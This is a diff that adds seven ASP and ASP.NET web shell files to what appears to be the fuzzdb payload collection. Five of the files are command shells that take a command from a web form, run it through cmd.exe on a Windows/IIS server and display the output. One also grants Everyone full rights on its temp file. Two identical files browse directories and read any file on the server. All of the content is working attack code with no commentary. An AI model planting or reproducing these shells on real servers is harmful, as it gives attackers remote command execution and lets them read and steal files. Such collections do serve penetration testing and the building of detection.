fzuudb-webshell

fuzzdb-webshell/asp/cmd-asp-5.1.asp

@@ -0,0 +1,41 @@
+<%
+
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com 
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+
+
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
+  ' Here we do the command
+  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+"""",0,True)
+  response.write szTF
+  ' Change perms
+  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If 
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+<!--    http://michaeldaw.org   2006    -->

fuzzdb-webshell/asp/cmd.asp

@@ -0,0 +1,47 @@
+<!--
+
+ASP_KIT
+
+cmd.asp = Command Execution
+
+by: Maceo
+modified: 25/06/2003
+
+-->
+
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+szCMD = request("cmd")
+
+If (szCMD <> "") Then
+  szTempFile = "C:\" & oFileSys.GetTempName( )
+  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+  End If
+%>
+
+<HTML>
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
+
+
+

fuzzdb-webshell/asp/cmd.aspx

@@ -0,0 +1,37 @@
+<%@ Page Language="VB" Debug="true" %>
+<%@ import Namespace="system.IO" %>
+<%@ import Namespace="System.Diagnostics" %>
+
+<script runat="server">      
+
+Sub RunCmd(Src As Object, E As EventArgs)            
+  Dim myProcess As New Process()            
+  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            
+  myProcessStartInfo.UseShellExecute = false            
+  myProcessStartInfo.RedirectStandardOutput = true            
+  myProcess.StartInfo = myProcessStartInfo            
+  myProcessStartInfo.Arguments=xcmd.text            
+  myProcess.Start()            
+
+  Dim myStreamReader As StreamReader = myProcess.StandardOutput            
+  Dim myString As String = myStreamReader.Readtoend()            
+  myProcess.Close()            
+  mystring=replace(mystring,"<","&lt;")            
+  mystring=replace(mystring,">","&gt;")            
+  result.text= vbcrlf & "<pre>" & mystring & "</pre>"    
+End Sub
+
+</script>
+
+<html>
+<body>    
+<form runat="server">        
+<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        
+<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        
+<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        
+<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        
+<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        
+<p><asp:Label id="result" runat="server"></asp:Label>       
+</form>
+</body>
+</html>

fuzzdb-webshell/asp/cmdasp.asp

@@ -0,0 +1,55 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  '  File:    CmdAsp.asp
+  '  Author:  Maceo <maceo @ dogmile.com>
+  '  Release: 2000-12-01
+  '  OS:      Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
+
+<!--    http://michaeldaw.org   2006    -->

fuzzdb-webshell/asp/cmdasp.aspx

@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>awen asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>
+
+<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
+<!--    http://michaeldaw.org   04/2007    -->

fuzzdb-webshell/asp/list.asp

@@ -0,0 +1,79 @@
+<!--
+
+ASP_KIT
+
+list.asp = Directory & File View
+
+by: darkraver
+modified: 16/12/2005
+
+-->
+
+<body>
+<html>
+
+<%
+
+file=request("file")
+tipo=request("type")
+
+If file="" then
+	file="c:\"
+	tipo="1"
+End If
+
+%>
+
+
+<FORM action="" method="GET">
+<INPUT TYPE="text" NAME="file" value="<%=file%>">
+<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
+<INPUT TYPE="submit" Value="Consultar">
+</FORM>
+
+
+<%
+
+If tipo="1" then
+    Response.Write("<h3>PATH: " & file & "</h3>")
+	ListFolder(file)
+End If
+
+If tipo="2" then
+    Response.Write("<h3>FILE: " & file & "</h3>")
+
+    Set oStr = server.CreateObject("Scripting.FileSystemObject")
+    Set oFich = oStr.OpenTextFile(file, 1)
+
+	Response.Write("<pre>--<br>")
+
+    Response.Write(oFich.ReadAll)
+
+    Response.Write("<br>--</pre>")
+
+End If
+%>
+
+<%
+
+sub ListFolder(path)
+
+	set fs = CreateObject("Scripting.FileSystemObject")
+	set folder = fs.GetFolder(path)
+
+	Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
+
+	for each item in folder.SubFolders
+		Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
+	next
+
+	for each item in folder.Files
+		Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
+	next
+
+end sub
+
+%>
+
+</body>
+</html>

fuzzdb-webshell/asp/list.txt

@@ -0,0 +1,79 @@
+<!--
+
+ASP_KIT
+
+list.asp = Directory & File View
+
+by: darkraver
+modified: 16/12/2005
+
+-->
+
+<body>
+<html>
+
+<%
+
+file=request("file")
+tipo=request("type")
+
+If file="" then
+	file="c:\"
+	tipo="1"
+End If
+
+%>
+
+
+<FORM action="" method="GET">
+<INPUT TYPE="text" NAME="file" value="<%=file%>">
+<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
+<INPUT TYPE="submit" Value="Consultar">
+</FORM>
+
+
+<%
+
+If tipo="1" then
+    Response.Write("<h3>PATH: " & file & "</h3>")
+	ListFolder(file)
+End If
+
+If tipo="2" then
+    Response.Write("<h3>FILE: " & file & "</h3>")
+
+    Set oStr = server.CreateObject("Scripting.FileSystemObject")
+    Set oFich = oStr.OpenTextFile(file, 1)
+
+	Response.Write("<pre>--<br>")
+
+    Response.Write(oFich.ReadAll)
+
+    Response.Write("<br>--</pre>")
+
+End If
+%>
+
+<%
+
+sub ListFolder(path)
+
+	set fs = CreateObject("Scripting.FileSystemObject")
+	set folder = fs.GetFolder(path)
+
+	Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
+
+	for each item in folder.SubFolders
+		Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
+	next
+
+	for each item in folder.Files
+		Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
+	next
+
+end sub
+
+%>
+
+</body>
+</html>